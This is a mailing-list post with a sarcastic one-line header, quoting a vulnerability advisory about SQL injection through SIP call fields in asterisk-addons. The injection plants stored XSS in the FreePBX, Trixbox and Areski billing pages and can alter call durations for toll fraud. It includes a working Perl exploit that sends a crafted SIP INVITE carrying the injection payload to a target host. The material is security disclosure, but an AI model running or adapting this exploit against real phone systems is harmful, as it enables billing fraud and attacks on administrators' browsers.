LOL !!!!XSS!!!! PDP ALERT !!! THEY ARE STEALING YOUR RESEARCH!
On 10/19/07, Radu State <[EMAIL PROTECTED]> wrote: > > In a previous post (http://seclists.org/fulldisclosure/2007/Oct/0174.html) > , we have seen how XSS injection can be performed over SIP to inject > malicious JavaScript into the browser of an user that check the call > history of his phone. In this post, we will detail how XSS injection can be > performed over SIP by an additional SQL injection. > > > > Some SIP proxies store information gathered from SIP headers into databses > used for billing and accounting purposes. This is also the case for the > vulnerability disclosed In the following. If this information is not > properly filtered, once it will be displayed to the administrator it can > perform a second order SQL Injection, that is : during the display, it gets > interpreted as SQL by the application. In this case, two things can result: > First, the database can be changed (for instance the call length can be > changed to a small value and thus the caller can do toll fraud. Sometimes, > if the target system is not well secured, SQL injection can lead to system > compromise because most database server allow some interaction with the > target OS. > > > > However, the additional feature is that XSS can also result, because > JavaScript can be stored into the database with the SQL injection and > executed on the browser when the admin will check it (this is a kind of log > Injection process). As was pointed out in my previous posting, XSS can be > used with tools like Beef and XSS proxy to scan the internal network, > deactivate firewalls, basically all the dangers of CSRF/XSRF are not a > reality. The main issue is that most applications that deal with CDR data > are not considering this type of threat. > > * * > > *Title :* SQL injection in asterisk-addons and XSS injection in WWW > application in Areski, FreePBX and Trixbox > > > > Id: KIPH 12* > > * > > *Credits * > > *Humberto Abdelnur (Ph.D student) the Madynes group at INRIA * > > *Radu** State** (Ph.D), the Madynes group at INRIA * > > *Olivier Festor (Ph.D), the Madynes group at INRIA * > > * * > > > > *Software version for which vendors were notified:* > > > > Asterisk-addon (SQL injection) > > Areski v 2.0.1 and earlier (XSS injection) > > FreePBX (2.3.00 and earlier) XSS injection > > Tribox v.2.3.1 and earlier (XSS injection) > > > > *Severity:* High, XSS and SQL injection can lead to the compromise of > an internal network > > > *Overview: > > * > > Asterisk as itself does not support billing reports but provide libraries, > asterisk-addon, which may allow a third entity to compute them. Specifically > the functions exported by cdr_addon_mysql.c allows to log the Call Detail > Records (CDR) in the MySQL database. > > Areski, FreePBX and Trixbox use the information stored in such database in > order to manage, compute generate billing reports or display the load of > the PBX. > > *Vulnerability Synopsis:* > > Certain functions in cdr_addon_mysql.c do not properly escaped input > characters from fields of incoming calls before to stored them in the > database. This issue will allow, to a malicious user, two main attacks: > > 1. Inject SQL statements which will obfuscate the quantity of > minute made for the billing > 2. Inject through the SQL statement values which will be recognized > as a Java script when a WWW management application for CDR run. > > The attack may be performed by an unsubscribed user in the domain (if > anonymous calls are allowed). > This attacker may inject negative number in the CDR table in order to > decrease the minutes of calling. Also, the attacker may inject Java Script > tags to be executed by the administrator PC when she/he enter to the CDR > website. > > Note that in order to perform the Cross Script injection, the SQL > injection technique is necessary due that special characters as "<" are to > be filtered by asterisk, while with the SQL injection they can be rewritten > as 0x60 (Hexadecimal representation) which wont be filtered. > > *Impact:* > > Information from the database can be manipulated for malicious used. > > Execution of malicious scripts may be executed in the administrator > machine. > > *Proof of Concept:* > > > The script will create an entry with duration values -9 and > <script>alert(1)</script> that will be show when the administrator check the > website. > > *Command**: *asterisk_cdr_sqlinjection.pl <callUser> <targetIP> > <targetPort> <attackerUser> <localIP> <localPort> > > -- > > #!/usr/bin/perl > > > > ############################################# > > # Vulnerabily discovered using KiF ~ Kiph # > > # # > > # Authors: # > > # Humberto J. Abdelnur (Ph.D Student) # > > # Radu State (Ph.D) # > > # Olivier Festor (Ph.D) # > > # # > > # Madynes Team, LORIA - INRIA Lorraine # > > # http://madynes.loria.fr # > > ############################################# > > > > use IO::Socket::INET; > > use String::Random; > > $foo = new String::Random; > > > > die "Usage $0 <callUser> <targetIP> <targetPort> <attackerUser> <localIP> > <localPort>" unless ($ARGV[5]); > > > > sub iso2hex($) { > > my $hex = ''; > > for (my $i = 0; $i < length($_[0]); $i++) { > > my $ordno = ord substr($_[0], $i, 1); > > $hex .= sprintf("%lx", $ordno); > > } > > > > $hex =~ s/ $//;; > > $hex; > > } > > > > > > $callUser = $ARGV[0]; > > $targetIP = $ARGV[1]; > > $targetPort = $ARGV[2]; > > > > $attackerUser = $ARGV[3]; > > $attackerIP= $ARGV[4]; > > $attackerPort= $ARGV[5]; > > > > $socket=new IO::Socket::INET->new( > > Proto=>'udp', > > PeerPort=>$targetPort, > > PeerAddr=>$targetIP, > > LocalPort=>$attackerPort); > > > > $scriptinjection= iso2hex("<script>alert(1)</script>"); > > $sqlinjection= "',1,2,3,4,5,-9,-9,0x$scriptinjection,6,7,8)/*"; > > > > $callid= $foo->randpattern("CCccnCn"); > > $cseq = $foo->randregex('\d\d\d\d'); > > > > $sdp = "v=0\r > > o=Lupilu 63356722367567875 63356722367567875 IN IP4 $attackerIP\r > > s=-\r > > c=IN IP4 $attackerIP\r > > t=0 0\r > > m=audio 49152 RTP/AVP 96 0 8 97 18 98 13\r > > a=sendrecv\r > > a=ptime:20\r > > a=maxptime:200\r > > a=fmtp:96 mode-change-neighbor=1\r > > a=fmtp:18 annexb=no\r > > a=fmtp:98 0-15\r > > a=rtpmap:96 AMR/8000/1\r > > a=rtpmap:0 PCMU/8000/1\r > > a=rtpmap:8 PCMA/8000/1\r > > a=rtpmap:97 iLBC/8000/1\r > > a=rtpmap:18 G729/8000/1\r > > a=rtpmap:98 telephone-event/8000/1\r > > a=rtpmap:13 CN/8000/1\r > > "; > > $sdplen= length $sdp; > > > > $msg = "INVITE sip:[EMAIL PROTECTED] SIP/2.0\r > > Via: SIP/2.0/UDP $attackerIP;branch=z9hG4bK1;rport\r > > From: <sip:[EMAIL PROTECTED]>;tag=1\r > > To: <sip:[EMAIL PROTECTED]>\r > > Call-ID: [EMAIL PROTECTED] > > CSeq: $cseq INVITE\r > > Max-Forwards: 70\r > > Contact: <sip:[EMAIL PROTECTED]>\r > > Content-Type: application/sdp\r > > Content-Length: $sdplen\r > > \r > > $sdp"; > > > > $socket->send($msg); > > > > > > > > > > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.grok.org.uk/full-disclosure-charter.html > Hosted and sponsored by Secunia - http://secunia.com/ >
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/